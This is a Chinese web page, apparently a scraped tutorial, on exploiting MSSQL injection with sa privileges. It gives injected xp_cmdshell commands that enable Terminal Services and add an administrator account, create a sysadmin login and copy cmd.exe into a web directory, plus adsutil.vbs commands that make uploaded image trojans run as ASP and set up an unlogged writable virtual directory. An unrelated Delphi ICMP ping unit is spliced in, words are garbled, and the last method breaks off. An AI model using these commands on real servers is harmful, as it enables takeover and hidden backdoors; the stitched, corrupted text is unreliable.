调用icmp.dll实现Ping功能

mssql injection之sa的利用

数据库和网站放同一服务器：

方法一:

开TS，加账户上去，具体语句如下：

;exec master.dbo.xp_cmdshell @echo [Components] > c:sql
;exec master.dbo.xp_cmdshell @echo TSEnable = on >> c:sql
;exec master.dbo.xp_cmdshell @sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q
;exec master.dbo.xp_cmdshell @del C:server

Exec Master..Xp_CmdShell net user linzi 123 /add

Exec Master..Xp_CmdShell net localgroup administrators linzi /add

方法二:
下面代码调用icmp.dll实现Ping功能。

unit PingUnit;
inte易做图ce
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
ExtCtrls, StdCtrls,winsock;
type
PIPOptionInformation = ^TIPOptionInformation;
TIPOptionInformation = packed record
TTL: Byte;
TOS: Byte;
Flags: Byte;
OptionsSize: Byte;
OptionsData: PChar;
end;

PIcmpEchoReply = ^TIcmpEchoReply;
TIcmpEchoReply = packed record
Address: DWORD;
Status: DWORD;
RTT: DWORD;
DataSize: Word;
Reserved: Word;
Data: Pointer;
Options: TIPOptionInformation;
end;
TIcmpCreateFile = function: THandle; stdcall;
TIcmpCloseHandle = function(IcmpHandle: THandle): Boolean; stdcall;
TIcmpSendEcho = function(IcmpHandle:THandle;
DestinationAddress: DWORD;
RequestData: Pointer;
RequestSize: Word;
RequestOptions: PIPOptionInformation;
ReplyBuffer: Pointer;
ReplySize: DWord;
Timeout: DWord
): DWord; stdcall;
TPingForm = class(TForm)
    StatusShow: TMemo;
    Panel1: TPanel;
    pingedit: TEdit;
    exebutton: TButton;
    procedure FormCreate(Sender: TObject);
    procedure exebuttonClick(Sender: TObject);
private
    { Private declarations }

hICMP: THANDLE;
IcmpCreateFile : TIcmpCreateFile;
IcmpCloseHandle: TIcmpCloseHandle;
IcmpSendEcho: TIcmpSendEcho;
public
{ Public declarations }
end;

var
PingForm: TPingForm;

implementation

{$R *.DFM}

procedure TPingForm.FormCreate(Sender: TObject);
var
WSAData: TWSAData;
hICMPdll: HMODULE;
begin
   wsastartup($101,wsadata);
   hICMPdll := LoadLibrary(’icmp.dll’);
   @ICMPCreateFile := GetProcAddress(hICMPdll, ’IcmpCreateFile’);
   @IcmpCloseHandle := GetProcAddress(hICMPdll, ’IcmpCloseHandle’);
   @IcmpSendEcho := GetProcAddress(hICMPdll, ’IcmpSendEcho’);
   hICMP := IcmpCreateFile;
   StatusShow.Text := ’’;
   statusshow.Align := alclient;
   StatusShow.Lines.Add(’目的IP地址字节数返回时间(毫秒)’);
end;

procedure TPingForm.exebuttonClick(Sender: TObject);
var
   IPOpt:TIPOptionInformation;// IP Options for packet to send
   FIPAddress:DWORD;
   pReqData,pRevData:PChar;
   pIPE:PIcmpEchoReply;// ICMP Echo reply buffer
   FSize: DWORD;
   MyString:string;
   FTimeOut:DWORD;
   BufferSize:DWORD;
begin
    if PingEdit.Text 〈〉 ’’ then
   begin
     FIPAddress := inet_addr(PChar(PingEdit.Text));
     FSize := 40;
     BufferSize := SizeOf(TICMPEchoReply) + FSize;
     GetMem(pRevData,FSize);
     GetMem(pIPE,BufferSize);
     FillChar(pIPE^, SizeOf(pIPE^), 0);
     pIPE^.Data := pRevData;
     MyString := ’Hello,World’;
     pReqData := PChar(MyString);
     FillChar(IPOpt, Sizeof(IPOpt), 0);
     IPOpt.TTL := 64;
     FTimeOut := 4000;
     IcmpSendEcho(hICMP, FIPAddress, pReqData, Length(MyString), @IPOpt, pIPE, BufferSize, FTimeOut);
      try
       if pReqData^ = pIPE^.Options.OptionsData^ then
           begin
             StatusShow.Lines.Add(PChar(PingEdit.Text) + ’      ’ +IntToStr(pIPE^.DataSize) + ’      ’ +IntToStr(pIPE^.RTT));
           end;
        except
        messagedlg(’没有找到该IP地址!’,mtinformation,[mbok],0);
        end;
     FreeMem(pRevData);
     FreeMem(pIPE);
    end;
end;
end.

用asp.dll解析jpg格式，然后通过上传点，合法的上传一个asp木马，主要是利用Adsutil.vbs

这个脚本来实现。

具体语句是:
csc太阳pt C:InetpubAdminSc太阳ptsadsutil.vbs ENUM w3svc/3/root 得到其目录
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/3/Root/Sc太阳ptMaps ".jpg,c:winntsystem32inetsrvasp.dll,5,GET,HEAD,POST,TRACE" ".asp,c:winntsystem32inetsrvasp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:winntMicrosoft.NETFrameworkv1.1.4322aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"

方法三:

加个system权限的用户，然后用查询分析器连接上去

具体语句:

;exec master.dbo.sp_addlogin linzi;--

;exec master.dbo.sp_password null,linzi,linzi;--

;exec master.dbo.sp_addsrvrolemember linzi sysadmin;--

方法四:

老洞新用.构造原始的U漏洞，然后用小金写的工具连接上去，实现上传

具体语句如下:

;exec master.dbo.xp_cmdshellcopy c:winntsystem32cmd.exe c:inetpubsc太阳ptslinzi.exe

方法五:

利用Adsutil.vbs建一个有浏览，写，执行等权限的目录，然后实现上传

具体语句如下:

csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs CREATE W3SVC/1/Root/linzi "IIsWebVirtualDir"
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AppIsolated 0
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/Path "c:"
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessExecute 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessSource 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessRead 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessSc太阳pt 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/AccessW太阳te 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/Sc太阳ptMaps ".asp,c:WINDOWSsystem32inetsrvasp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:WINDOWSMicrosoft.NETFrameworkv1.1.4322aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/DontLog 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/EnableDirBrowsing 1
csc太阳pt c:InetpubAdminSc太阳ptsadsutil.vbs SET W3SVC/1/Root/linzi/EnableDefaultDoc 0

然后http://ip/linzi/登上去

方法六:

暴路径，然后，写入小马，或者上传一张图木马，然后再用copy命令把扩展名改成asp

具体语句如下:

补充：综合编程 , 安全编程 ,